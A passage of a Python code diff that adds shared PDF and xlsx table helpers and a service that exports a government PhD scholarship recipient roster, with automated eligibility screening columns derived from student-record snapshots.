+the third consumer. It owns the pieces every tabular export shares:
+
+- reportlab paragraph styles (CJK font + ``wordWrap="CJK"``) and the grid
+  ``TableStyle`` recipe;
+- the ``KeepInFrame`` cell wrapper that stops one overlong cell from raising
+  ``LayoutError`` and 500-ing the whole export (a reportlab ``Table`` cannot
+  split a single row across pages);
+- weight-driven column sizing, shared between the PDF (points) and xlsx
+  (character-width) renderers so the two formats keep one source of truth;
+- the openpyxl title/header/border helpers.
+
+Renderers stay responsible for their own column model, row values and
+``sanitize_excel_cell`` calls — the chassis never decides content.
+"""
+
+from __future__ import annotations
+
+from typing import Any, List, Sequence, Tuple
+
+# `escape` is a pure string-escaping helper (`<` → `&lt;` …) used to sanitise
+# cell values before they go into reportlab Paragraph markup. It does not parse
+# untrusted XML, so the B406 warning is a false positive here.
+from xml.sax.saxutils import escape as xml_escape  # nosec B406
+
+from openpyxl.styles import Alignment, Border, Font, PatternFill, Side
+from openpyxl.utils import get_column_letter
+from reportlab.lib import colors
+from reportlab.lib.styles import ParagraphStyle
+from reportlab.lib.units import mm
+from reportlab.platypus import KeepInFrame, Paragraph
+
+from app.services.pdf_fonts import CJK_FONT_NAME
+from app.utils.excel_safety import sanitize_excel_cell
+
+PDF_MARGIN_PT = 10 * mm
+# Vertical space reserved (per page) for the title + spacer + repeated header rows.
+PDF_HEADER_RESERVE_PT = 60
+
+# Excel width per unit of PDF column weight, plus a fixed padding allowance.
+XLSX_WIDTH_PER_WEIGHT = 8
+XLSX_WIDTH_PADDING = 6
+
+_HEADER_FILL = PatternFill("solid", fgColor="DDDDDD")
+
+
+def safe_str(value: Any) -> str:
+    return "" if value is None else str(value)
+
+
+# -------- PDF helpers --------
+
+
+def make_pdf_styles(prefix: str) -> Tuple[ParagraphStyle, ParagraphStyle, ParagraphStyle]:
+    """Return (title, header, cell) paragraph styles for one export's PDF.
+
+    ``wordWrap="CJK"`` on header/cell styles breaks long CJK runs AND unspaced
+    ASCII (emails, student IDs) that would otherwise overflow the column.
+    """
+    title_style = ParagraphStyle(
+        f"{prefix}PdfTitle",
+        fontName=CJK_FONT_NAME,
+        fontSize=12,
+        leading=15,
+        alignment=1,  # center
+    )
+    header_style = ParagraphStyle(
+        f"{prefix}PdfHeader",
+        fontName=CJK_FONT_NAME,
+        fontSize=8,
+        leading=10,
+        alignment=1,
+        wordWrap="CJK",
+    )
+    cell_style = ParagraphStyle(
+        f"{prefix}PdfCell",
+        fontName=CJK_FONT_NAME,
+        fontSize=7.5,
+        leading=9,
+        wordWrap="CJK",
+    )
+    return title_style, header_style, cell_style
+
+
+def pdf_col_widths(weights: Sequence[float], usable_width: float) -> List[float]:
+    """Normalise relative column weights to the usable page width."""
+    total = sum(weights) or 1.0
+    return [usable_width * w / total for w in weights]
+
+
+def pdf_paragraph(text: Any, style: ParagraphStyle) -> Paragraph:
+    """A Paragraph with reportlab-markup characters escaped."""
+    return Paragraph(xml_escape(safe_str(text)), style)
+
+
+def pdf_cell(value: Any, *, width: float, max_height: float, style: ParagraphStyle) -> KeepInFrame:
+    """One body cell, capped to the usable page height.
+
+    A reportlab ``Table`` cannot split ONE row across pages, so a single very
+    long cell would raise ``LayoutError`` and fail the WHOLE export. Capping
+    each cell and letting ``KeepInFrame`` shrink anything taller keeps the
+    export alive no matter what free text arrives from SIS/students.
+    """
+    return KeepInFrame(width, max_height, [pdf_paragraph(value, style)], mode="shrink")
+
+
+def base_pdf_table_style(header_rows: int = 1) -> List[tuple]:
+    """The shared grid recipe; consumers may append SPAN/extra commands."""
+    return [
+        ("GRID", (0, 0), (-1, -1), 0.4, colors.Color(0.6, 0.6, 0.6)),
+        ("BACKGROUND", (0, 0), (-1, header_rows - 1), colors.Color(0.87, 0.87, 0.87)),
+        ("VALIGN", (0, 0), (-1, -1), "TOP"),
+        ("FONTNAME", (0, 0), (-1, -1), CJK_FONT_NAME),
+        ("LEFTPADDING", (0, 0), (-1, -1), 3),
+        ("RIGHTPADDING", (0, 0), (-1, -1), 3),
+        ("TOPPADDING", (0, 0), (-1, -1), 2),
+        ("BOTTOMPADDING", (0, 0), (-1, -1), 2),
+    ]
+
+
+# -------- xlsx helpers --------
+
+
+def write_xlsx_title_row(ws, *, title: str, total_cols: int) -> None:
+    """Row 1: title merged across all columns.
+
+    Sanitized like the data rows: callers' f-strings happen to lead with an int
+    today, but that is incidental — this keeps a formula trigger impossible
+    regardless of how the title is built.
+    """
+    ws.cell(row=1, column=1, value=sanitize_excel_cell(title))
+    if total_cols > 1:
+        ws.merge_cells(start_row=1, start_column=1, end_row=1, end_column=total_cols)
+    title_cell = ws.cell(row=1, column=1)
+    title_cell.font = Font(bold=True, size=14)
+    title_cell.alignment = Alignment(horizontal="center", vertical="center")
+
+
+def style_xlsx_header_cell(cell) -> None:
+    cell.font = Font(bold=True)
+    cell.alignment = Alignment(horizontal="center", vertical="center", wrap_text=True)
+    cell.fill = _HEADER_FILL
+
+
+def apply_xlsx_borders(ws, *, max_row: int, max_col: int, first_row: int = 2) -> None:
+    """Thin borders from ``first_row`` down — the title row stays borderless."""
+    thin = Side(style="thin", color="999999")
+    border = Border(left=thin, right=thin, top=thin, bottom=thin)
+    for r in range(first_row, max_row + 1):
+        for c in range(1, max_col + 1):
+            ws.cell(row=r, column=c).border = border
+
+
+def apply_xlsx_column_widths(ws, weights: Sequence[float]) -> None:
+    """Size xlsx columns from the SAME weights the PDF uses.
+
+    Deriving width from header text length instead would clamp every 2-char CJK
+    header to an identical width, silently ignoring the weights.
+    """
+    for idx, weight in enumerate(weights, start=1):
+        width = round(XLSX_WIDTH_PER_WEIGHT * weight) + XLSX_WIDTH_PADDING
+        ws.column_dimensions[get_column_letter(idx)].width = width

--- a/backend/app/services/manual_distribution_export_service.py
+++ b/backend/app/services/manual_distribution_export_service.py
@@ -1,0 +1,524 @@
+"""Admin 分發名單 (受獎名冊) export service.
+
+Pure rendering logic for the manual-distribution 分發結果名單 export: receives
+the allocated groups the ``/manual-distribution/distribution-summary`` endpoint
+loads (one group per sub_type × 消耗年度配額) and returns xlsx or PDF bytes.
+The endpoint layer is responsible for loading and authorizing the data.
+
+The column layout follows the 國科會「補助大學校院推動研究生獎學金試辦方案」
+受獎博士生名冊: 序號 / 基本資料 (學院・系所・姓名・國籍・性別・碩士畢業院校系所)
+/ 學籍資料 (首次註冊入學日期・學號) / 請領資格檢核 (left blank for the 承辦人
+to fill in). Three extra columns automate the parts of the 第三點第一款至四款
+ineligibility check that the SIS snapshot can answer (see the ``derive_*``
+functions); everything the SIS cannot see — e.g. outside full-time employment —
+stays with the manual blank column.
+
+The auto-check columns are derived from the ``Application.student_data``
+snapshot taken at submission time, NOT a fresh SIS pull — a student who 休學
+after being awarded still reads 在學 here. Roster generation re-verifies with
+fresh SIS data; these columns are a screening aid, hence the group header
+註明「依申請時學籍資料自動判定」.
+
+``build_workbook`` and ``build_pdf`` share one source of truth for the column
+set, group-header spans, per-row cell values and column sizing (``_COLUMNS``),
+so the two formats never drift apart. The table chassis (PDF styles,
+KeepInFrame cells, border/width helpers) comes from
+``app.services.export_table_chassis``.
+
+SCOPE — this layout is deliberately fixed, not configuration-driven. Unlike the
+scholarship RULES (which are DB-driven per project CLAUDE.md §3), these columns
+reproduce one external government form verbatim, so they are owned by 國科會 and
+not by an administrator: making them configurable would let a config edit
+produce a roster 國科會 rejects. The consequence is that this renderer is
+PhD-flavoured — 受獎博士生首次註冊入學日期, 碩士畢業院/校/系所 and
+``MASTER_SCHOOL_FIELD`` (a ``phd``-seeded dynamic field) — while the endpoint
+applies it to whatever ``scholarship_type_id`` it is given. That is fine today
+because the 分發 sub-type flow (nstc / moe_*) is the PhD scholarship, and every
+field degrades to an empty cell rather than wrong data for other types. If a
+second scholarship ever needs a DIFFERENT official roster form, select the
+renderer per scholarship type here — do not parameterise these columns.
+
+Carries NO high-sensitivity PII (no 身分證字號, no 匯款帳號), but 姓名/學號/國籍/
+性別 plus the derived 學籍 flags are still personal data about identified
+students, so the endpoint writes a ``pii_access`` AuditLog.
+"""
+
+from __future__ import annotations
+
+import io
+import re
+from dataclasses import dataclass
+from typing import Any, List, Optional, Sequence, Tuple
+
+from openpyxl import Workbook
+from reportlab.lib.pagesizes import A4, landscape
+from reportlab.lib.styles import ParagraphStyle
+from reportlab.lib.units import mm
+from reportlab.platypus import PageBreak, SimpleDocTemplate, Spacer, Table, TableStyle
+
+from app.core.college_mappings import COLLEGE_MAPPINGS
+from app.services.export_table_chassis import (
+    PDF_HEADER_RESERVE_PT,
+    PDF_MARGIN_PT,
+    apply_xlsx_borders,
+    apply_xlsx_column_widths,
+    base_pdf_table_style,
+    make_pdf_styles,
+    pdf_cell,
+    pdf_col_widths,
+    pdf_paragraph,
+    safe_str,
+    style_xlsx_header_cell,
+    write_xlsx_title_row,
+)
+from app.services.pdf_fonts import CJK_FONT_NAME, ensure_cjk_font
+from app.utils.excel_safety import sanitize_excel_cell
+
+# -------- Column model (single source of truth for BOTH formats) --------
+
+_BASIC_GROUP = "基本資料"
+_REGISTRY_GROUP = "學籍資料"
+_MANUAL_CHECK_GROUP = "請領資格檢核"
+AUTO_CHECK_GROUP = "學籍系統檢核(依申請時學籍資料自動判定)"
+
+# (group header or None, column header, PDF column weight). A None group means
+# the column header spans both header rows (the form's 序號 column). HEADERS and
+# the weight vector derive from this one list so they can never drift.
+_COLUMNS: List[Tuple[Optional[str], str, float]] = [
+    (None, "序號", 0.5),
+    (_BASIC_GROUP, "學院", 0.9),
+    (_BASIC_GROUP, "系所", 1.2),
+    (_BASIC_GROUP, "姓名", 0.9),
+    (_BASIC_GROUP, "國籍", 0.8),
+    (_BASIC_GROUP, "性別", 0.5),
+    (_BASIC_GROUP, "碩士畢業院/校/系所", 1.7),
+    (_REGISTRY_GROUP, "受獎博士生首次註冊入學日期(民國年.月.日)", 1.1),
+    (_REGISTRY_GROUP, "學號", 0.9),
+    (_MANUAL_CHECK_GROUP, "有無本試辦方案第三點第一款至四款之情形(填寫有或無)", 1.2),
+    (AUTO_CHECK_GROUP, "1.於公私立機構從事專職全時之有給職工作或以在職生身分報考者", 1.3),
+    (AUTO_CHECK_GROUP, "2.以香港、澳門及大陸地區學生身分入學者", 1.2),
+    (AUTO_CHECK_GROUP, "3.錄取後辦理休學、保留入學資格或未完成註冊者", 1.3),
+]
+
+HEADERS: List[str] = [label for _, label, _ in _COLUMNS]
+_COL_WEIGHTS: List[float] = [weight for _, _, weight in _COLUMNS]
+
+# -------- Auto-check verdicts --------
+
+CHECK_FLAGGED = "有"
+CHECK_CLEAR = "無"
+CHECK_UNVERIFIABLE = "無法檢核"
+
+# SIS code tables — seeded by alembic 6d5b1940bf8a (reference tables) and
+# app/core/enroll_types.py. Only the codes this export interprets are pinned
+# here; anything else is treated as "not flagged".
+_SCHOOLID_IN_SERVICE = 2  # std_schoolid (school_identities): 2 = 在職生
+_ENROLL_TYPES_IN_SERVICE = frozenset({2, 5})  # std_enrolltype: 招生考試在職生 / 推甄在職生
+_IDENTITY_MAINLAND = 17  # std_identity (identities): 17 = 陸生
+_ENROLL_TYPE_MAINLAND = 17  # std_enrolltype: 17 = 陸生
+_STUDY_STATUS_FLAGGED = frozenset({4, 9, 10})  # studying_statuses: 休學 / 保留學籍 / 放棄入學
+# 港澳 has NO SIS identity code (the identities table stops at 僑生/外籍生/陸生),
+# so the only available signal is the free-text 國籍 / 僑居地 fields. Matched as
+# SUBSTRINGS (and identically in both fields) because the SIS free text is not a
+# controlled vocabulary — "中國", "中國大陸" and "中華人民共和國香港特別行政區" all
+# occur. 中華民國 is safe against every keyword here: substrings are contiguous,
+# and 中華民國 contains neither "中國" (中華民國 → 中華/華民/民國) nor "大陸".
+_CROSS_STRAIT_KEYWORDS = ("中國", "中華人民共和國", "大陸", "香港", "澳門")
+
+
+def _as_int(value: Any) -> Optional[int]:
+    """SIS snapshot codes arrive as int, float or numeric string; coerce or give up.
+
+    Goes via ``float`` so a JSON number that arrived as ``1.0`` (or ``"1.0"``)
+    still reads as code 1 — ``int("1.0")`` raises, which would silently downgrade
+    a real verdict to 無法檢核.
+    """
+    if value is None or isinstance(value, bool):
+        return None
+    try:
+        return int(float(str(value).strip()))
+    except (TypeError, ValueError):
+        return None
+
+
+def _as_text(value: Any) -> str:
+    """Trimmed text for any SIS snapshot value.
+
+    ``student_data`` is raw API JSON, so a field the schema documents as a
+    string can arrive as a number (e.g. a numeric 系所代碼). Calling ``.strip()``
+    on that raises AttributeError and 500s the WHOLE export, while the JSON panel
+    — which never strips — renders it fine.
+    """
+    if value is None:
+        return ""
+    return value.strip() if isinstance(value, str) else str(value)
+
+
+def derive_employment_check(student_data: dict) -> str:
+    """試辦方案第三點第一款: 從事專職全時有給職工作「或以在職生身分報考」.
+
+    Only the 在職生 half is visible to the SIS (身分別 or 入學管道); outside
+    employment is not — that part stays with the manual 請領資格檢核 column.
+    """
+    schoolid = _as_int(student_data.get("std_schoolid"))
+    enroll_type = _as_int(student_data.get("std_enrolltype"))
+    if schoolid == _SCHOOLID_IN_SERVICE or enroll_type in _ENROLL_TYPES_IN_SERVICE:
+        return CHECK_FLAGGED
+    if schoolid is None and enroll_type is None:
+        return CHECK_UNVERIFIABLE
+    return CHECK_CLEAR
+
+
+def derive_cross_strait_check(student_data: dict) -> str:
+    """試辦方案第三點第二款: 以香港、澳門及大陸地區學生身分入學."""
+    identity = _as_int(student_data.get("std_identity"))
+    enroll_type = _as_int(student_data.get("std_enrolltype"))
+    nation = _as_text(student_data.get("std_nation"))
+    oversea = _as_text(student_data.get("std_overseaplace"))
+    if identity == _IDENTITY_MAINLAND or enroll_type == _ENROLL_TYPE_MAINLAND:
+        return CHECK_FLAGGED
+    if any(k in nation or k in oversea for k in _CROSS_STRAIT_KEYWORDS):
+        return CHECK_FLAGGED
+    if identity is None and enroll_type is None and not nation and not oversea:
+        return CHECK_UNVERIFIABLE
+    return CHECK_CLEAR
+
+
+def derive_study_status_check(student_data: dict) -> str:
+    """試辦方案第三點第三款: 錄取後辦理休學、保留入學資格或未完成註冊.
+
+    Reads BOTH the term-level and student-level status because either may lag
+    the other in the snapshot; a flag on either counts.
+    """
+    term_status = _as_int(student_data.get("trm_studystatus"))
+    student_status = _as_int(student_data.get("std_studingstatus"))
+    if term_status in _STUDY_STATUS_FLAGGED or student_status in _STUDY_STATUS_FLAGGED:
+        return CHECK_FLAGGED
+    if term_status is None and student_status is None:
+        return CHECK_UNVERIFIABLE
+    return CHECK_CLEAR
+
+
+# -------- Snapshot field rendering --------
+
+
+def format_enrollment_date_roc(student_data: dict) -> str:
+    """Format enrollment date as ROC calendar (民國年.月.日).
+
+    Single source of truth shared with the manual-distribution grid
+    (``ManualDistributionService._format_enrollment_date`` delegates here), so
+    the export can never disagree with the panel.
+
+    Both codes go through ``_as_int`` like every other SIS field in this module:
+    the snapshot is raw API JSON, so a numeric STRING ``"1"`` is possible, and a
+    bare ``== 1`` would silently print February for a September enrolment.
+    Semantics otherwise unchanged and pinned by the existing tests: only term 1
+    is September (a missing term defaults to 1, anything else — including an
+    uncoercible value — falls to February), and a missing/zero year renders "".
+    """
+    enroll_year = _as_int(student_data.get("std_enrollyear"))
+    raw_term = student_data.get("std_enrollterm")
+    enroll_term = 1 if raw_term is None else _as_int(raw_term)
+    # Approximate: term 1 = September, term 2 = February
+    month = "09" if enroll_term == 1 else "02"
+    return f"{enroll_year}.{month}.01" if enroll_year else ""
+
+
+def _gender_label(student_data: dict) -> str:
+    sex = _as_int(student_data.get("std_sex"))
+    if sex == 1:
+        return "男"
+    if sex == 2:
+        return "女"
+    return ""
+
+
+def _college_label(student_data: dict) -> str:
+    name = _as_text(student_data.get("trm_academyname"))
+    if name:
+        return name
+    code = _as_text(student_data.get("std_academyno")) or _as_text(student_data.get("trm_academyno"))
+    return COLLEGE_MAPPINGS.get(code, code)
+
+
+MASTER_SCHOOL_FIELD = "master_school_info"
+
+
+def _master_school_info(application: Any) -> str:
+    """碩士畢業院/校/系所 — the student-typed dynamic form field carries the full
+    校/院/系所 string; the SIS ``std_highestschname`` fallback knows the school
+    name only."""
+    form_data = getattr(application, "submitted_form_data", None) or {}
+    fields_map = form_data.get("fields") if isinstance(form_data, dict) else None
+    entry = fields_map.get(MASTER_SCHOOL_FIELD) if isinstance(fields_map, dict) else None
+    if isinstance(entry, dict):
+        value = entry.get("value")
+        if value not in (None, ""):
+            return str(value)
+    student_data = getattr(application, "student_data", None) or {}
+    return _as_text(student_data.get("std_highestschname"))
+
+
+# -------- Row / group model --------
+
+
+@dataclass(frozen=True)
+class RecipientExportRow:
+    """One awarded student, in form column order."""
+
+    # 序號 is assigned by the CALLER and runs continuously across every group in
+    # one export (it does NOT restart per sheet/page): the 名冊 is filed as a
+    # single document, so 序號 N must identify one student unambiguously.
+    seq: int
+    college: str
+    department: str
+    student_name: str
+    nationality: str
+    gender: str
+    master_school: str
+    enrollment_date: str
+    student_number: str
+    employment_check: str
+    cross_strait_check: str
+    study_status_check: str
+
+
+@dataclass(frozen=True)
+class RecipientExportGroup:
+    """One 分發 group: sub_type × 消耗配額年度."""
+
+    label: str  # ScholarshipSubTypeConfig.name, falling back to the raw code
+    sub_type_code: str
+    allocation_year: Optional[int]
+    rows: List[RecipientExportRow]
+
+
+def build_recipient_row(seq: int, application: Any) -> RecipientExportRow:
+    """Derive one export row from an Application's SIS snapshot + form data."""
+    student_data = getattr(application, "student_data", None) or {}
+    return RecipientExportRow(
+        seq=seq,
+        college=_college_label(student_data),
+        department=_as_text(student_data.get("trm_depname")),
+        student_name=_as_text(student_data.get("std_cname")),
+        nationality=_as_text(student_data.get("std_nation")),
+        gender=_gender_label(student_data),
+        master_school=_master_school_info(application),
+        enrollment_date=format_enrollment_date_roc(student_data),
+        student_number=_as_text(student_data.get("std_stdcode")),
+        employment_check=derive_employment_check(student_data),
+        cross_strait_check=derive_cross_strait_check(student_data),
+        study_status_check=derive_study_status_check(student_data),
+    )
+
+
+# -------- Header layout (shared by both formats) --------
+
+
+def _group_runs() -> List[Tuple[Optional[str], int, int]]:
+    """Consecutive (group, first_col, last_col) runs over _COLUMNS, 0-based."""
+    runs: List[Tuple[Optional[str], int, int]] = []
+    for idx, (group, _, _) in enumerate(_COLUMNS):
+        if runs and runs[-1][0] is not None and runs[-1][0] == group:
+            runs[-1] = (group, runs[-1][1], idx)
+        else:
+            runs.append((group, idx, idx))
+    return runs
+
+
+_INVALID_SHEET_CHARS = re.compile(r"[\[\]:*?/\\]")
+_SHEET_NAME_MAX = 31
+
+
+def _sheet_name(group: RecipientExportGroup, used: set) -> str:
+    base = group.label or group.sub_type_code or "分發名單"
+    if group.allocation_year is not None:
+        base = f"{base}_{group.allocation_year}"
+    base = _INVALID_SHEET_CHARS.sub("_", base)[:_SHEET_NAME_MAX] or "分發名單"
+    name = base
+    suffix = 2
+    while name in used:
+        tail = f"_{suffix}"
+        name = base[: _SHEET_NAME_MAX - len(tail)] + tail
+        suffix += 1
+    used.add(name)
+    return name
+
+
+def _group_heading(group: RecipientExportGroup) -> str:
+    year_part = f"　{group.allocation_year}年度配額" if group.allocation_year is not None else ""
+    return f"{group.label}({group.sub_type_code}){year_part}　共{len(group.rows)}人"
+
+
+class ManualDistributionExportService:
+    """Builds the admin 分發名單 recipient roster as xlsx or PDF."""
+
+    def build_workbook(self, *, groups: Sequence[RecipientExportGroup], title: str) -> bytes:
+        """One sheet per 分發 group, each with the two-row grouped form header."""
+        wb = Workbook()
+        wb.remove(wb.active)
+        used_names: set = set()
+
+        for group in groups:
+            ws = wb.create_sheet(_sheet_name(group, used_names))
+            self._write_sheet(ws, group.rows, title=f"{title}－{_group_heading(group)}")
+
+        if not wb.sheetnames:
+            # Zero groups: an openpyxl workbook with no sheets saves as a corrupt
+            # file. The endpoint 404s before this, so this is renderer-level
+            # robustness only: emit one empty roster sheet instead.
+            self._write_sheet(wb.create_sheet("分發名單"), [], title=title)
+
+        buf = io.BytesIO()
+        wb.save(buf)
+        return buf.getvalue()
+
+    def _write_sheet(self, ws, rows: Sequence[RecipientExportRow], *, title: str) -> None:
+        total_cols = len(_COLUMNS)
+
+        write_xlsx_title_row(ws, title=title, total_cols=total_cols)
+
+        # Rows 2-3: the form's grouped header. Group cells merge across their
+        # columns; the un-grouped 序號 column merges down both rows instead.
+        for grp, first, last in _group_runs():
+            if grp is None:
+                ws.cell(row=2, column=first + 1, value=_COLUMNS[first][1])
+                ws.merge_cells(start_row=2, start_column=first + 1, end_row=3, end_column=first + 1)
+            else:
+                ws.cell(row=2, column=first + 1, value=grp)
+                if last > first:
+                    ws.merge_cells(start_row=2, start_column=first + 1, end_row=2, end_column=last + 1)
+                for col in range(first, last + 1):
+                    ws.cell(row=3, column=col + 1, value=_COLUMNS[col][1])
+        for row_idx in (2, 3):
+            for col_idx in range(1, total_cols + 1):
+                style_xlsx_header_cell(ws.cell(row=row_idx, column=col_idx))
+
+        # Data rows — written from the same _row_cells used by the PDF export.
+        for offset, row in enumerate(rows):
+            excel_row = offset + 4  # rows 1-3 are title + two header rows
+            for col_idx, value in enumerate(self._row_cells(row), start=1):
+                # SECURITY: neutralize spreadsheet formula injection — 姓名/系所/
+                # 碩士畢業校系 are SIS- or student-supplied free text.
+                ws.cell(row=excel_row, column=col_idx, value=sanitize_excel_cell(value))
+
+        apply_xlsx_borders(ws, max_row=len(rows) + 3, max_col=total_cols)
+        apply_xlsx_column_widths(ws, _COL_WEIGHTS)
+        ws.freeze_panes = "A4"
+
+    def build_pdf(self, *, groups: Sequence[RecipientExportGroup], title: str) -> bytes:
+        """Render the same roster as an A4-landscape PDF, one page-run per group.
+
+        Mirrors ``build_workbook`` exactly (same columns, spans, rows via
+        ``_group_runs`` / ``_row_cells``). ``sanitize_excel_cell`` is deliberately
+        NOT applied here: reportlab has no formula semantics, so the apostrophe
+        prefix would be a visible artifact. This is the one place the two formats
+        legitimately diverge.
+        """
+        ensure_cjk_font()
+
+        page_width, page_height = landscape(A4)
+        usable_width = page_width - (PDF_MARGIN_PT * 2)
+        col_widths = pdf_col_widths(_COL_WEIGHTS, usable_width)
+        cell_max_height = page_height - (PDF_MARGIN_PT * 2) - PDF_HEADER_RESERVE_PT
+
+        title_style, header_style, cell_style = make_pdf_styles("RecipientRoster")
+        section_style = ParagraphStyle(
+            "RecipientRosterPdfSection",
+            fontName=CJK_FONT_NAME,
+            fontSize=10,
+            leading=13,
+            wordWrap="CJK",
+        )
+
+        elements: List[Any] = [pdf_paragraph(title, title_style), Spacer(1, 4 * mm)]
+        for group_idx, group in enumerate(groups):
+            if group_idx > 0:
+                elements.append(PageBreak())
+            elements.append(pdf_paragraph(_group_heading(group), section_style))
+            elements.append(Spacer(1, 2 * mm))
+            elements.append(
+                self._group_table(
+                    group,
+                    col_widths=col_widths,
+                    cell_max_height=cell_max_height,
+                    header_style=header_style,
+                    cell_style=cell_style,
+                )
+            )
+
+        buf = io.BytesIO()
+        doc = SimpleDocTemplate(
+            buf,
+            pagesize=landscape(A4),
+            leftMargin=PDF_MARGIN_PT,
+            rightMargin=PDF_MARGIN_PT,
+            topMargin=PDF_MARGIN_PT,
+            bottomMargin=PDF_MARGIN_PT,
+        )
+        doc.build(elements)
+        return buf.getvalue()
+
+    # -------- PDF table assembly --------
+
+    def _group_table(
+        self,
+        group: RecipientExportGroup,
+        *,
+        col_widths: List[float],
+        cell_max_height: float,
+        header_style: ParagraphStyle,
+        cell_style: ParagraphStyle,
+    ) -> Table:
+        group_row: List[Any] = [""] * len(_COLUMNS)
+        label_row: List[Any] = [""] * len(_COLUMNS)
+        span_commands: List[tuple] = []
+        for grp, first, last in _group_runs():
+            if grp is None:
+                group_row[first] = pdf_paragraph(_COLUMNS[first][1], header_style)
+                span_commands.append(("SPAN", (first, 0), (first, 1)))
+            else:
+                group_row[first] = pdf_paragraph(grp, header_style)
+                if last > first:
+                    span_commands.append(("SPAN", (first, 0), (last, 0)))
+                for col in range(first, last + 1):
+                    label_row[col] = pdf_paragraph(_COLUMNS[col][1], header_style)
+
+        data: List[list] = [group_row, label_row]
+        for row in group.rows:
+            data.append(
+                [
+                    pdf_cell(safe_str(v), width=col_widths[col], max_height=cell_max_height, style=cell_style)
+                    for col, v in enumerate(self._row_cells(row))
+                ]
+            )
+
+        table = Table(data, colWidths=col_widths, repeatRows=2)
+        table.setStyle(TableStyle(base_pdf_table_style(header_rows=2) + span_commands))
+        return table
+
+    # -------- Shared column/value model (single source of truth) --------
+
+    def _row_cells(self, row: RecipientExportRow) -> List[Any]:
+        """Ordered cell values for one row.
+
+        The xlsx writer keeps the native int for 序號 (proper Excel typing); the
+        PDF renderer stringifies it. The 請領資格檢核 column is deliberately
+        empty — the 承辦人 fills it in by hand (the SIS cannot answer 第四款,
+        already-receiving-another-government-scholarship, at all).
+        """
+        return [
+            row.seq,
+            row.college,
+            row.department,
+            row.student_name,
+            row.nationality,
+            row.gender,
+            row.master_school,
+            row.enrollment_date,
+            row.student_number,
+            "",  # 請領資格檢核 — manual
+            row.employment_check,
+            row.cross_strait_check,
+            row.study_status_check,
+        ]

--- a/backend/app/services/manual_distribution_export_service.py
+++ b/backend/app/services/manual_distribution_export_service.py
@@ -58,13 +58,13 @@ from reportlab.platypus import PageBreak, SimpleDocTemplate, Spacer, Table, Tabl
 
 from app.core.college_mappings import COLLEGE_MAPPINGS
 from app.services.export_table_chassis import (
-    PDF_HEADER_RESERVE_PT,
     PDF_MARGIN_PT,
     apply_xlsx_borders,
     apply_xlsx_column_widths,
     base_pdf_table_style,
     make_pdf_styles,
     pdf_cell,
+    pdf_cell_max_height,
     pdf_col_widths,
     pdf_paragraph,
     safe_str,
@@ -73,6 +73,12 @@ from app.services.export_table_chassis import (
 )
 from app.services.pdf_fonts import CJK_FONT_NAME, ensure_cjk_font
 from app.utils.excel_safety import sanitize_excel_cell
+
+# Snapshot coercion/rendering lives in a LEAF util so ManualDistributionService can
+# share it without dragging reportlab/openpyxl into the core service import graph.
+from app.utils.student_snapshot_fields import as_int as _as_int
+from app.utils.student_snapshot_fields import as_text as _as_text
+from app.utils.student_snapshot_fields import format_enrollment_date_roc
 
 # -------- Column model (single source of truth for BOTH formats) --------
 
@@ -126,34 +132,6 @@ _STUDY_STATUS_FLAGGED = frozenset({4, 9, 10})  # studying_statuses: 休學 / 保
 _CROSS_STRAIT_KEYWORDS = ("中國", "中華人民共和國", "大陸", "香港", "澳門")
 
 
-def _as_int(value: Any) -> Optional[int]:
-    """SIS snapshot codes arrive as int, float or numeric string; coerce or give up.
-
-    Goes via ``float`` so a JSON number that arrived as ``1.0`` (or ``"1.0"``)
-    still reads as code 1 — ``int("1.0")`` raises, which would silently downgrade
-    a real verdict to 無法檢核.
-    """
-    if value is None or isinstance(value, bool):
-        return None
-    try:
-        return int(float(str(value).strip()))
-    except (TypeError, ValueError):
-        return None
-
-
-def _as_text(value: Any) -> str:
-    """Trimmed text for any SIS snapshot value.
-
-    ``student_data`` is raw API JSON, so a field the schema documents as a
-    string can arrive as a number (e.g. a numeric 系所代碼). Calling ``.strip()``
-    on that raises AttributeError and 500s the WHOLE export, while the JSON panel
-    — which never strips — renders it fine.
-    """
-    if value is None:
-        return ""
-    return value.strip() if isinstance(value, str) else str(value)
-
-
 def derive_employment_check(student_data: dict) -> str:
     """試辦方案第三點第一款: 從事專職全時有給職工作「或以在職生身分報考」.
 
@@ -200,28 +178,6 @@ def derive_study_status_check(student_data: dict) -> str:
 
 
 # -------- Snapshot field rendering --------
-
-
-def format_enrollment_date_roc(student_data: dict) -> str:
-    """Format enrollment date as ROC calendar (民國年.月.日).
-
-    Single source of truth shared with the manual-distribution grid
-    (``ManualDistributionService._format_enrollment_date`` delegates here), so
-    the export can never disagree with the panel.
-
-    Both codes go through ``_as_int`` like every other SIS field in this module:
-    the snapshot is raw API JSON, so a numeric STRING ``"1"`` is possible, and a
-    bare ``== 1`` would silently print February for a September enrolment.
-    Semantics otherwise unchanged and pinned by the existing tests: only term 1
-    is September (a missing term defaults to 1, anything else — including an
-    uncoercible value — falls to February), and a missing/zero year renders "".
-    """
-    enroll_year = _as_int(student_data.get("std_enrollyear"))
-    raw_term = student_data.get("std_enrollterm")
-    enroll_term = 1 if raw_term is None else _as_int(raw_term)
-    # Approximate: term 1 = September, term 2 = February
-    month = "09" if enroll_term == 1 else "02"
-    return f"{enroll_year}.{month}.01" if enroll_year else ""
 
 
 def _gender_label(student_data: dict) -> str:
@@ -420,9 +376,19 @@ class ManualDistributionExportService:
         page_width, page_height = landscape(A4)
         usable_width = page_width - (PDF_MARGIN_PT * 2)
         col_widths = pdf_col_widths(_COL_WEIGHTS, usable_width)
-        cell_max_height = page_height - (PDF_MARGIN_PT * 2) - PDF_HEADER_RESERVE_PT
 
         title_style, header_style, cell_style = make_pdf_styles("RecipientRoster")
+
+        # Cap body cells against the MEASURED 2-row header, not a fixed reserve:
+        # this table's repeated header is ~twice the single-row one the chassis
+        # constant was sized for, and a cap even slightly too generous makes
+        # reportlab raise LayoutError on free text as short as 700 characters.
+        cell_max_height = pdf_cell_max_height(
+            page_height,
+            header_height=self._measure_header_height(
+                col_widths=col_widths, header_style=header_style, page_height=page_height
+            ),
+        )
         section_style = ParagraphStyle(
             "RecipientRosterPdfSection",
             fontName=CJK_FONT_NAME,
@@ -461,15 +427,12 @@ class ManualDistributionExportService:
 
     # -------- PDF table assembly --------
 
-    def _group_table(
-        self,
-        group: RecipientExportGroup,
-        *,
-        col_widths: List[float],
-        cell_max_height: float,
-        header_style: ParagraphStyle,
-        cell_style: ParagraphStyle,
-    ) -> Table:
+    def _header_rows(self, header_style: ParagraphStyle) -> Tuple[List[Any], List[Any], List[tuple]]:
+        """The two grouped header rows + the SPAN commands that shape them.
+
